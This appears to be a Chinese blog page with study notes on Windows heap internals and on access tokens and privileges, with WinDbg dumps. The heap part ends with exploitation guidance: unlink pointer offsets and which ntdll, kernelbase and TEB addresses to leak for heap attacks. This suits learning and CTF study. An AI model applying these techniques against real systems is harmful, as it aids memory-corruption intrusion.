HeapFree(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, heap[2]);

这边打印的堆地址如下:

0: [0x18f0498]
1: [0x18f0530]
2: [0x18f05c8]
3: [0x18f0660]

代码后面，heap[0],heap[2]都被我们释放了，所以应该可以形成如上的链表。如果我们用windbg，从内存中去看的_HEAP_ENTRY的话，可能会有一点奇怪的感觉:

0:001> dt _HEAP_FREE_ENTRY 0x18f0490
ntdll!_HEAP_FREE_ENTRY
   +0x000 HeapEntry        : _HEAP_ENTRY
   +0x000 UnpackedEntry    : _HEAP_UNPACKED_ENTRY
   +0x000 Size             : 0xe91
   +0x002 Flags            : 0xf2 ''
   +0x003 SmallTagIndex    : 0x79 'y'
   +0x000 SubSegmentCode   : 0x79f20e91
   +0x004 PreviousSize     : 0xef60
   +0x006 SegmentOffset    : 0 ''
   +0x006 LFHFlags         : 0 ''
   +0x007 UnusedBytes      : 0 ''
   +0x000 ExtendedEntry    : _HEAP_EXTENDED_ENTRY
   +0x000 FunctionIndex    : 0xe91
   +0x002 ContextValue     : 0x79f2
   +0x000 InterceptorValue : 0x79f20e91
   +0x004 UnusedBytesLength : 0xef60
   +0x006 EntryOffset      : 0 ''
   +0x007 ExtendedBlockSignature : 0 ''
   +0x000 Code1            : 0x79f20e91
   +0x004 Code2            : 0xef60
   +0x006 Code3            : 0 ''
   +0x007 Code4            : 0 ''
   +0x004 Code234          : 0xef60
   +0x000 AgregateCode     : 0x0000ef60`79f20e91
   +0x008 FreeList         : _LIST_ENTRY [ 0x18f06f8 - 0x18f05c8 ]

可以看到，FreeList似乎是正确的，我们追踪一下内存会发现确实没有问题:

0:001> dd 0x18f0498 <----- heap[0]
018f0498  018f06f8 018f05c8 feeefeee feeefeee
0:001> dd 0x18f05c8 <----- heap[2]
018f05c8  018f0498 018f00c0 feeefeee feeefeee
0:001> dd 0x18f00c0 <----- FreeList empty block
018f00c0  018f05c8 018f06f8 00000000 57da77c4

但是这个_HEAP_ENTRY好像有点怪怪的，因为我们申请的堆块大小似乎不是0xe91，而是0x80。这是因为这个时候的chunk header被_HEAP.Encoding加密过。为了得到真正的header，我们需要将这个值修改一下。

6ef60e82为Encoding中的值
0:001> ?6ef60e82^79f20e91
Evaluate expression: 386138131 = 17040013
0:001> ?0000ef60^6ef60e82
Evaluate expression: 1861673442 = 6ef6e1e2
0:001> ed  018f0490 17040013
0:001> ed  018f0494 6ef6e1e2
0:001> dt _HEAP_ENTRY 0x18f0490
ntdll!_HEAP_ENTRY
   +0x000 UnpackedEntry    : _HEAP_UNPACKED_ENTRY
   +0x000 Size             : 0x13
   +0x002 Flags            : 0x4 ''
   +0x003 SmallTagIndex    : 0x17 ''
   +0x000 SubSegmentCode   : 0x17040013
   +0x004 PreviousSize     : 0xe1e2
   +0x006 SegmentOffset    : 0xf6 ''
   +0x006 LFHFlags         : 0xf6 ''
   +0x007 UnusedBytes      : 0x6e 'n'
   +0x000 ExtendedEntry    : _HEAP_EXTENDED_ENTRY
   +0x000 FunctionIndex    : 0x13
   +0x002 ContextValue     : 0x1704
   +0x000 InterceptorValue : 0x17040013
   +0x004 UnusedBytesLength : 0xe1e2
   +0x006 EntryOffset      : 0xf6 ''
   +0x007 ExtendedBlockSignature : 0x6e 'n'
   +0x000 Code1            : 0x17040013
   +0x004 Code2            : 0xe1e2
   +0x006 Code3            : 0xf6 ''
   +0x007 Code4            : 0x6e 'n'
   +0x004 Code234          : 0x6ef6e1e2
   +0x000 AgregateCode     : 0x6ef6e1e2`17040013

这次看过来，首先我们知道开头的三个字节是需要过checknum的，我们确认一下0x13^0x00^0x4 -> 0x17，也就是说SmallTagIndex的验证是能通过的，说明这个就是我们此时的chunk header。然后我们计算一下我们这个chunk的size，为0x13*8->0x98
有点奇怪？我们申请的应该是0x80才对呀，不过看到分配的地址:

1
2
3

0: [0x18f0498]
1: [0x18f0530]
0x18f0498+0x98=0x18f0530

说明大小是没错的，这个大小和我们申请有出入其实是因为我们申请的大小正好导致堆没有16字节地址对齐，同时没有把chunk header以及 PreviuseBlockPrivateData计算进去导致的。sizeof(chunkheader)=8, previouse data=8，如果按照(0x90)申请的话，chunk地址空间正好为0x18f0520

使用插件指令:


!heap -a <--  列出所有的堆 或者 !haep -i heap <--- 指定堆

然后
!heap -i heap entry address <---指定堆地址

可以直接看到解密之后的堆信息，如下:

0:004> !heap -a
0:004> !heap -i 01690528    <--- 真实分配的地址-sizeof(chunkheader)
Detailed information for block entry 01690528
Assumed heap       : 0x01690000 (Use !heap -i NewHeapHandle to change)
Header content     : 0xDC7A7744 0x18004F36 (decoded : 0x14070013 0x18000013)
Owning segment     : 0x01690000 (offset 0)
Block flags        : 0x7 (busy extra fill )
Total block size   : 0x13 units (0x98 bytes)
Requested size     : 0x80 bytes (unused 0x18 bytes)
Previous block size: 0x13 units (0x98 bytes)
Block CRC          : OK - 0x14  
Previous block     : 0x01690490
Next block         : 0x016905c0

BlocksIndex（_HEAP_LIST_LOOKUP)

用于管理不同大小的被free之后的堆块，这类堆块就和fastbin类似，不会被merge（？）

0:004> dt _HEAP_LIST_LOOKUP
ntdll!_HEAP_LIST_LOOKUP
   +0x000 ExtendedLookup   : Ptr32 _HEAP_LIST_LOOKUP
   +0x004 ArraySize        : Uint4B
   +0x008 ExtraItem        : Uint4B
   +0x00c ItemCount        : Uint4B
   +0x010 OutOfRangeItems  : Uint4B
   +0x014 BaseIndex        : Uint4B
   +0x018 ListHead         : Ptr32 _LIST_ENTRY
   +0x01c ListsInUseUlong  : Ptr32 Uint4B
   +0x020 ListHints        : Ptr32 Ptr32 _LIST_ENTRY

ExtendedLookup: 指向下一个ExtendedLookup，下一个BlocksIndex将会管理更加大的chunks
ArraySize: 当前BlocksIndex将会管理的最大的chunk的大小
- 第一个BlocksIndex的ArraySize大小为0x80（实际上为0x800）
ItemCount: 当前大小的chunks的数量
OutofRangeItems: 超过了当前BlocksIndex管理的chunks大小的chunk的数量
BeseIndex: 在Blocksindex中起始的chunk的index。
- 通常可以用来在ListHint中找到合适的空闲堆块
- 下一个BlocksIndex中的BaseIndex为当前BaseIndex中的最大值
ListHead(_HEAP_ENTRY): FreeList的Head
ListsInUseUlong: 是一个bitmap，用来确定当前ListHint中是否有合适的chunk
ListHint: 是一个指针数组，其中每一个指针将会指向对应大小的chunk 数组
- 这个结构体能够帮助更快的找到对应的chunk
- chunk的间隔为0x10，即是chunk大小为0x20, 0x30 …

实例：BlocksIndex的使用

我们将代码修改一下:

heap[0] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
heap[1] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x1);
heap[2] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x80);
heap[3] = HeapAlloc(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, 0x90);
for (int i = 0; i < 4; i++) {
   printf("%d: [0x%x]\n", i, heap[i]);
}
puts("check the alloc heap~");
getchar();
// now will free heap
HeapFree(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, heap[0]);
// we don't know if it will merge... just reserve 1
HeapFree(hHeap, HEAP_NO_SERIALIZE | HEAP_ZERO_MEMORY, heap[2]);
puts("ok please debug it~");
getchar();

打印堆内容如下:

0: [0x1110498]
1: [0x1110530]
2: [0x1110550]
3: [0x11105e8]

此时的场景为：

有两个堆被free了，大小一致
两个堆大小均为 0x80
heap[0]早于heap[2]被free

知道了上述三个条件之后，我们来看一下内存布局，大致如下:

BlocksIndex中的ListHead中存放了指向_HEAP中FreeList(_HEAP+0xc0)的指针
ListHint[0x13]中存放的正好是指向大小为0x13*8=0x98的chunk的地址
ListHint中记录的是后面释放的那个堆，也就是说堆块相当于是队列的形式进入FreeList中的
ListsUlong 的值为0x80000，如果从0开始数的话，正好是下标为0x13的地方为1，象征着ListHint[13]不为空

内存分配

堆的分配大致可以分为三种不同的分配方式:

size<=0x4000
0x4000
size>0xff000

分配内存主要由APIRtlAllocateHeap实现，我们分别介绍三种不同的堆块的分配方式

`Size <= 0x4000`

首先需要check FrontEndHeapStatusBitmap对应大小的标志位是否有设置（如果设置了，那么分配的堆块将会是LFH的）
如果没有设置的话，在FrontEndHeapUsageData上加上0x21 2.1 检查当前的值是否超过了0xff00 ，或者&0x1f之后，是否大于0x10 2.2 如果2.1成立，那么此时还是使用LFH
检查ListHint 对应的大小是否有值。如果为证，那么将会把ListHint中对应的第一个chunk取出来 3.1 如果此时ListHint中大小正好合适，那么直接从ListHint中移除，然后确认chunk中Flink中是否为大小chunk 3.2 3.1为真的时候，将ListHint中的值替换成Flink的值 3.3 否则，清除ListHint 3.4 最后，从chunk的链表中unlink这个chunk 3.5 如果3.1 找不到合适大小的chunk，那么首先在ListHint中寻找比当前size更到的chunk是否有合适的大小 3.6 如果3.5找到了，那么将那个chunk从ListHint中移除，并且将chunk切分，并且将剩下的chunk重新插入到FreeList中，并且把其放入ListHint 3.7 如果3.5找不到，那么就调用ExtendHeap，扩展堆大小，然后从中挑选和是的堆大小。

`0x4000 < size <= 0xff000`

除了LFH相关的操作，其他的操作和]Size <= 0x4000堆分配大小一样。

`Size > 0xff000 (VirtualMemoryThredshold << 4)`

使用ZwAllocateVirtualMenmory来直接分配堆
与mmap相似，也是分配一个大的内存堆块，然后将其插入到_HEAP->VirtualAllocdBlocks
_HEAP->VirtualAllocdBlocks是一个链表，用来管理后端堆使用VirualAllocate分配的堆块

`内存释放`

内存释放的话，主要分为两种情况

Size <= 0xff000
Sizeo > 0xff000

`Size <= 0xff000`

首先检查当前堆块的对齐情况，并且使用unused byte来确认当前堆块的状态 1.1 如果LFH是disable的状态，那么将FrontEndHeapUsageData-1 1.2 之后check上一个chunk或者下一个chunk（内存相邻的）的堆块是否是freed的状态，如果是的话，合并这些堆块 1.3 如果1.2 发生了合并，那么unlink这些chunk，并且从ListHint中移除 1.4 如果1.2 发生了合并，那么更新当前的size和presize，并且检查这个chunk是否是FreeList的第一个/最后一个chunk。如果是的话，重新插入到FreeList中，否则的话插入ListHint，并且将其更新。 1.5 当发生插入的时候，将会检查链表的完整性（flink->blink = blink->flink），但是这个check并不会终止进程

`Size > 0xff000`

检查链表完整性，并且从_HEAP->VirtualAllcdBlocks中取出来
然后使用RltSecMemFreeVirtualMemory来取消对这段内存的映射

`Unlink`

基本上和linux下的unlink是一样的，可以模仿这里最重要的是要模仿free过程中的check过程，但是Windows比较麻烦的是要能够保证checksum那个check要能够通过，所以最好还是有一个任意地址写比较方便。其次，与linux上的unlink区别是，windows计算freelist的时候，是不会将heap的头部计算进去的，所以不能无脑套公式，区别如下:

// Linux
fd = &block-0xc
bk = &block-0x8

// Windows
fd = &block-0x4
bk = &block

`Leak`

Windows heap pwn的话，主要考虑leak如下的内容

kernelbase
KERNELBASE!BasepFilterInfo
stack address

`ntdll.dll`

这个模块下主要要泄露的内容有

_HEAP_LOCK
- _HEAP->LockVariable.Lock
- CriticalSection->DebugInfo
- 指向ntdll的指针
PebLdr
- _PEB_LDR_DATA
- 找到dll的所有位置
- 然而，缺点是最后的两个字节通常是0
- 可以线找到binary base地址，然后从IAT中找到kernel32
BinaryBase
- 可以从IAT中找到kernel32的地址

`Kernel32`

这是一个很重要的dll，在这里能够找到很多有用的函数，并且能够从IAT中找到kernelbase.dll的地址

`kernelbase`

Kernelbase!BasepFilterInfo
- 指向堆的指针
- 能够大概率的在这个结构体中找到栈指针
如果BasepFilterInfo找不到stack的地址的话，那么可以从TEB找到地址。这个TEB地址通常会PEB在同一个页面中。

`踩坑`

最近windbg下载符号的时候好像是被墙了，这里需要在系统环境变量中添加_NT_SYMBOL_PROXY：本地代理地址，然后重启windbg即可下载符号。



Windows Via C/C++ note 4_2
2020-05-02T03:48:40.000Z
Windows 安全相关知识下半节，这一章主要讲一下除了SID，DACL这类，还有哪些安全对象也在 Windows 安全中发挥着重要的作用

Windows 安全相关（下）
这一段会尝试介绍一下 Windows 整个操作系统中，参与了安全保护的各个部件。
Access Token 访问令牌
当用户登录操作系统的时候，操作系统会要求用户输入密码，输入的密码会与Windows的安全数据库（security database）的信息进行比较。当密码得到验证（authenticated）之后，系统将会产生一个Access Token，代表了当前登录用户的权限。
每一个 Access Token 都是描述了一个进程或者线程的安全上下文，包括身份以及特权（privilege）。
Access Token 使用场合
当一个线程尝试进行如下操作的时候，操作系统会使用 Access Token 来识别一个用户
与安全对象（Secure Object）进行交互
执行一些需要系统权限的任务（例如对进程进行调试）
Access Token 包含内容
一个Access Token中实际上包含了如下的内容：
用户账户的SID
用户从属组的SID
当前登录会话(logon session)的SID
用户以及从属组所持有的特权
token 从属者的SID
主从属组(primary Group)的SID
当创建安全对象的时候，如果不指定安全描述符时系统会赋予的默认DACL
Access Token 的源
当前 token 是 primary（主token）还是 impersonation（模仿token）
一系列可选的限制Token （Restricted Token）
当前的模仿等级（impersonation level）
一些其他的东西
Primary/Impersonation Token 主Token/模仿token
从逻辑上讲，线程从属进程，而用户直接创建的是进程，所以进程中会持有象征着创建者的Token，这个Token就被称为主token （primary token）。一个主token中会记录当前用户与进程相关联的有效的安全上下文（secure context）。而实际上与安全对象交互的往往是线程，所以默认情况下主token是由线程携带与安全对象进行交互。
不过特殊情况下（例如在一些RPC场合，或者在一些CS架构的软件，server端限制client端权限的时候等），可能会出现某些线程需要以创建当前进程不同的，其他用户的身份访问安全对象的时候，这个时候会给线程一个特殊的token，被称为模仿token（impersonation token）。此时的线程使用属于自己的token，并且有不同于进程的权限。
相关API
此时可以使用
1
2
OpenProcessToken 
OpenThreadToken
来检查当前进程/线程的使用token
Windbg 查看方式
windbg中可以方便的查看一个进程的token
user mode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
!token
0:000> !token
Thread is not impersonating. Using process token...
TS Session ID: 0x1
User: S-1-5-21-3132730683-2216882805-422503560-1001
User Groups:
 00 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-114
    Attributes - DenyOnly 
 03 S-1-5-32-544
    Attributes - DenyOnly 
 04 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 05 S-1-5-32-559
    Attributes - Mandatory Default Enabled 
 06 S-1-5-4
    Attributes - Mandatory Default Enabled 
 07 S-1-2-1
    Attributes - Mandatory Default Enabled 
 08 S-1-5-11
    Attributes - Mandatory Default Enabled 
 09 S-1-5-15
    Attributes - Mandatory Default Enabled 
 10 S-1-11-96-3623454863-58364-18864-2661722203-1597581903-544001092-2724467026-4283684584-2191855628-1410562263
    Attributes - Mandatory Default Enabled 
 11 S-1-5-113
    Attributes - Mandatory Default Enabled 
 12 S-1-5-5-0-5228497
    Attributes - Mandatory Default Enabled LogonId 
 13 S-1-2-0
    Attributes - Mandatory Default Enabled 
 14 S-1-5-64-36
    Attributes - Mandatory Default Enabled 
Primary Group: S-1-5-21-3132730683-2216882805-422503560-1001
Privs: 
 00 0x000000013 SeShutdownPrivilege               Attributes - 
 01 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 02 0x000000019 SeUndockPrivilege                 Attributes - 
 03 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 04 0x000000022 SeTimeZonePrivilege               Attributes - 
Auth ID: 0:4fea7c
Impersonation Level: Anonymous
TokenType: Primary
Is restricted token: no.
SandBoxInert: 0
Elevation Type: 3 (Limited)
Mandatory Policy: TOKEN_MANDATORY_POLICY_VALID_MASK
Integrity Level: S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Process Trust Level:   LocalDumpSid failed to dump Sid at addr 000000ee876fabb8, 0xC0000078; try own SID dump.
s-1-0
    Attributes - 
Token Virtualized: Disabled
UIAccess: 0
IsAppContainer: 0
Security Attributes Information:
 00 Attribute Name: TSA://ProcUnique
    Value Type: TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64
    Value[0]: 283
    Value[1]: 428746286
Device Groups:
kernel mode
1
2
3
!process 0 0 // 找到对应的进程
!process PROCESS //查看具体的进程，找到其中的TOKEN
!token TOKEN // 查看token信息
实例：获取Token句柄
通常情况下，我们的程序拿到的token都是伪token(pseudo token)。这种方式主要是为了托管我们对内核句柄的操作:
1
HANDLE hToken = GetCurrentProcessToken();
如上，虽然从API可知我们尝试获取了当前进程中的token（也就是primary token）但是此时的token值为:0xfffffffffffffffc（64位下），显然不是一个真正的handle值。在某些场合下（需要知道确切句柄值的API的时候）会无法正常使用。如果需要知道此时真正的token的时候，需要使用OpenProcessToken这个API:
1
OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken);
这里注意，不可以使用DuplicateHandle这个API！因为这个API在MSDN上写的其实是:
If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.
也就是说只有进程和线程的伪句柄才生效。对于token的伪句柄是不生效的。
Restricted Token 限制令牌
限制令牌是由APICreateRestrictedToken创建的一种主/模仿token。一个跑在限制token的安全上下文的进程或者模仿线程将会收到访问安全对象的限制，以及一些特权操作的限制。具体来说，会以如下的方式来限制一个token
移除token中的特权
对 token 中的 SIDs 应用 deny-only 的属性，从而让其无法访问到安全对象。（详情看后面的访问令牌中的SID属性）
显示指定一系列的限制SID来限制安全对象访问
当系统检查一个token是对访问安全对象的访问权限的时候，系统通常会使用一系列的限制SIDs。当一个被限制的进程/线程尝试访问一个安全对象的时候，系统会进行两种检查：
检查token中被启用的SIDs
检查一系列的限制SIDs
只有当两种权限都被允许的时候，才能够访问这个对象。
API CreateProcessAsUser 拥有创建一个有指定token权限的进程，但是一般情况下需要有特权SE_ASSIGNPRIMARYTOKEN_NAME。然而，当指定的进程token为限制token的时候，创建的父进程可以不具有特权也可创建。
SID Attributes in an Access Token
每一个用户组拥有的访问token都有一系列的属性来说明操作系统要如何使用这个访问检查，一般来说有如下两种检查方式:
Attribute Description
SE_GROUP_ENABLED 启用了这个属性的SID能够被进行访问检查。当系统尝试进行访问检查的时候，当检查当前的SID对应的ACE中状态为allowed\deny的时候，能够被检查到。与此同时，未设置这个属性的（除了SE_GROUP_USE_FOR_DENY_ONLY）的SID将会被忽略检查
SE_GROUP_USE_FOR_DENY_ONLY 启用这个属性的SID被称为deny-only的SID，当系统进行访问检查的时候，只会检查对当前SID中deny的权限，而忽略所有allow的权限，也就是只关注这个SID被显示的拒绝了什么权限，而不关注其被允许的权限。一旦这个属性被设置的话，SE_GROUP_ENABLED将无法被设置，并且SID不能被enable。
对访问Token的访问权限控制
一个应用只有在获得相应权限的时候才能够去修改一个ACL。这些权限被记录在访问Token中的安全描述符中。
如果才想要设置一个访问Token的安全描述符的时候，需要调用GetKernelObjectSecurity/SetKernelObjectSecurity等相关API。
当需要使用OpenProcessToken/OpenThreadToken获取的Token的时候，系统就会检查请求的权限和记录在token的安全描述符中的DACL中的差异。一般来说一个有效的访问权限token有以下的权限：
标准权限中，不支持SYNCHRONIZE，其余的DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER 都有
拥有 ACCESS_SYSTEM_SECURITY的SACL的权限
其中Token还有一些只属于自己的权限。可以参考MSDN官方文档
特权 privilege
特权privilege（例如一般的用户账号或者组账号——在本地计算机中执行的各种与系统相关的操作(例如开关闭系统，加载驱动，更改系统事件等等)的权利。特权(privilege)和之前提到过的访问权限(access right)有两个不同的地方:
特权控制的是对系统资源以及系统相关任务的访问权限，然而访问权限控制的是对安全对象的访问权限。
只有系统管理员才能够将权限赋予用户/组（相当于提前给予的），然而系统可以基于一个对象的DCAL中的某一个ACE赋予/拒绝其对于某一个安全对象的访问权限。（相当于根据某个设定动态设定）
每一个系统都有一个用户数据库（account database），里面存储了每一个用户/组的特权信息。当用户尝试登录系统的时候，系统将会提供一个包含了当前用户所有特权的访问token，以及授予用户这个访问token中的用户/组的特权。不过，这个特权只适用于本地计算机，在域中并不适用。当用户尝试进行一个特权操作的时候，系统将会检查访问token中的特权位，检查其是否包含对应的特权权限，如果有的话，才会允许执行。这里大致展示一下:
TOKEN与Privilege
TOKEN的结构体大致长这个样子
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
typedef struct _TOKEN
{
     TOKEN_SOURCE TokenSource;
     LUID TokenId;
     LUID AuthenticationId;
     LUID ParentTokenId;
     LARGE_INTEGER ExpirationTime;
     PERESOURCE TokenLock;
     LUID ModifiedId;
     SEP_TOKEN_PRIVILEGES Privileges;
     SEP_AUDIT_POLICY AuditPolicy;
     ULONG SessionId;
     ULONG UserAndGroupCount;
     ULONG RestrictedSidCount;
     ULONG VariableLength;
     ULONG DynamicCharged;
     ULONG DynamicAvailable;
     ULONG DefaultOwnerIndex;
     PSID_AND_ATTRIBUTES UserAndGroups;
     PSID_AND_ATTRIBUTES RestrictedSids;
     PVOID PrimaryGroup;
     ULONG * DynamicPart;
     PACL DefaultDacl;
     TOKEN_TYPE TokenType;
     SECURITY_IMPERSONATION_LEVEL ImpersonationLevel;
     ULONG TokenFlags;
     UCHAR TokenInUse;
     ULONG IntegrityLevelIndex;
     ULONG MandatoryPolicy;
     PSECURITY_TOKEN_PROXY_DATA ProxyData;
     PSECURITY_TOKEN_AUDIT_DATA AuditData;
     PSEP_LOGON_SESSION_REFERENCES LogonSession;
     LUID OriginatingLogonSession;
     SID_AND_ATTRIBUTES_HASH SidHash;
     SID_AND_ATTRIBUTES_HASH RestrictedSidHash;
     ULONG VariablePart;
} TOKEN, *PTOKEN;
其中SEP_TOKEN_PRIVILEGES表示的就是当前TOKEN的特权：
1
2
3
4
nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B
这个_SEP_TOKEN_PRIVILEGES.Enabled中的每一个bit就表示一种特权。前文提到的当用户尝试进行一个特权操作的时候，系统将会检查访问token中的特权位，实际上就是检查SEP_TOKEN_PRIVILEGES.Enabled中的bit位是否为1.
实践：在windbg（kernel debug）下检查当前进程 token 的特权
用之前提过的技巧，首先找到当前进程的TOKEN地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
: kd> !process aed07600 1
PROCESS aed07600  SessionId: 1  Cid: 1b90    Peb: 00451000  ParentCid: 0d24
    DirBase: 3ffd35c0  ObjectTable: af3f4540  HandleCount:  38.
    Image: Exploit.exe
    VadRoot a6f684a0 Vads 31 Clone 0 Private 105. Modified 0. Locked 0.
    DeviceMap 9cf61548
    Token                             8bfd18a0 <--------------注意这里
    ElapsedTime                       00:04:57.845
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         25664
    QuotaPoolUsage[NonPagedPool]      2540
    Working Set Sizes (now,min,max)  (650, 50, 345) (2600KB, 200KB, 1380KB)
    PeakWorkingSetSize                784
    VirtualSize                       16 Mb
    PeakVirtualSize                   17 Mb
    PageFaultCount                    810
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      131
然后这里我们找到了对应token的地址，我们使用dt去检查一下其内存中的形式:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
1: kd> dt nt!_TOKEN  8bfd18a0
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff
   +0x030 TokenLock        : 0xaedba148 _ERESOURCE
   +0x034 ModifiedId       : _LUID
   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x078 SessionId        : 1
   +0x07c UserAndGroupCount : 0xf
   +0x080 RestrictedSidCount : 0
   +0x084 VariableLength   : 0x78
   +0x088 DynamicCharged   : 0x1000
   +0x08c DynamicAvailable : 0
   +0x090 DefaultOwnerIndex : 4
   +0x094 UserAndGroups    : 0x8bfd1b40 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : (null) 
   +0x09c PrimaryGroup     : 0xa3379658 Void
   +0x0a0 DynamicPart      : 0xa3379658  -> 0x501
   +0x0a4 DefaultDacl      : 0xa3379674 _ACL
   +0x0a8 TokenType        : 1 ( TokenPrimary )
   +0x0ac ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x0b0 TokenFlags       : 0x2000
   +0x0b4 TokenInUse       : 0x1 ''
   +0x0b8 IntegrityLevelIndex : 0xe
   +0x0bc MandatoryPolicy  : 1
   +0x0c0 LogonSession     : 0x9e7756c8 _SEP_LOGON_SESSION_REFERENCES
   +0x0c4 OriginatingLogonSession : _LUID
   +0x0cc SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x154 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x1dc pSecurityAttributes : 0xaf366428 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x1e0 Package          : (null) 
   +0x1e4 Capabilities     : (null) 
   +0x1e8 CapabilityCount  : 0
   +0x1ec CapabilitiesHash : _SID_AND_ATTRIBUTES_HASH
   +0x274 LowboxNumberEntry : (null) 
   +0x278 LowboxHandlesEntry : (null) 
   +0x27c pClaimAttributes : (null) 
   +0x280 TrustLevelSid    : (null) 
   +0x284 TrustLinkedToken : (null) 
   +0x288 IntegrityLevelSidValue : 0xae8aa528 Void
   +0x28c TokenSidValues   : 0x9e748038 _SEP_SID_VALUES_BLOCK
   +0x290 IndexEntry       : 0xb53e5b20 _SEP_LUID_TO_INDEX_MAP_ENTRY
   +0x294 DiagnosticInfo   : (null) 
   +0x298 BnoIsolationHandlesEntry : (null) 
   +0x29c SessionObject    : 0x8e0eb6f8 Void
   +0x2a0 VariablePart     : 0x9e748044
1: kd> dx -id 0,0,aed07600 -r1 (*((ntkrpamp!_SEP_TOKEN_PRIVILEGES *)0x8bfd18e0))
(*((ntkrpamp!_SEP_TOKEN_PRIVILEGES *)0x8bfd18e0))                 [Type: _SEP_TOKEN_PRIVILEGES]
    [+0x000] Present          : 0x1e73deff20 [Type: unsigned __int64]
    [+0x008] Enabled          : 0x60800000 [Type: unsigned __int64]
    [+0x010] EnabledByDefault : 0x60800000 [Type: unsigned __int64]
可以看到，_SEP_TOKEN_PRIVILEGES.Enabled的值为0x60800000，写成bit的形式就是:
1
1100000100000000000000000000000
此时直接查看token 的内容为:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
_EPROCESS 0xffffffffaed07600, _TOKEN 0x0000000000000000
TS Session ID: 0x1
User: S-1-5-21-3717723882-702046769-3252787667-1000
User Groups: 
 00 S-1-5-21-3717723882-702046769-3252787667-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-114
    Attributes - Mandatory Default Enabled 
 03 S-1-5-32-544
    Attributes - Mandatory Default Enabled Owner 
 04 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 05 S-1-5-4
    Attributes - Mandatory Default Enabled 
 06 S-1-2-1
    Attributes - Mandatory Default Enabled 
 07 S-1-5-11
    Attributes - Mandatory Default Enabled 
 08 S-1-5-15
    Attributes - Mandatory Default Enabled 
 09 S-1-5-113
    Attributes - Mandatory Default Enabled 
 10 S-1-5-5-0-141477
    Attributes - Mandatory Default Enabled LogonId 
 11 S-1-2-0
    Attributes - Mandatory Default Enabled 
 12 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 13 S-1-16-12288
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-3717723882-702046769-3252787667-513
Privs: 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
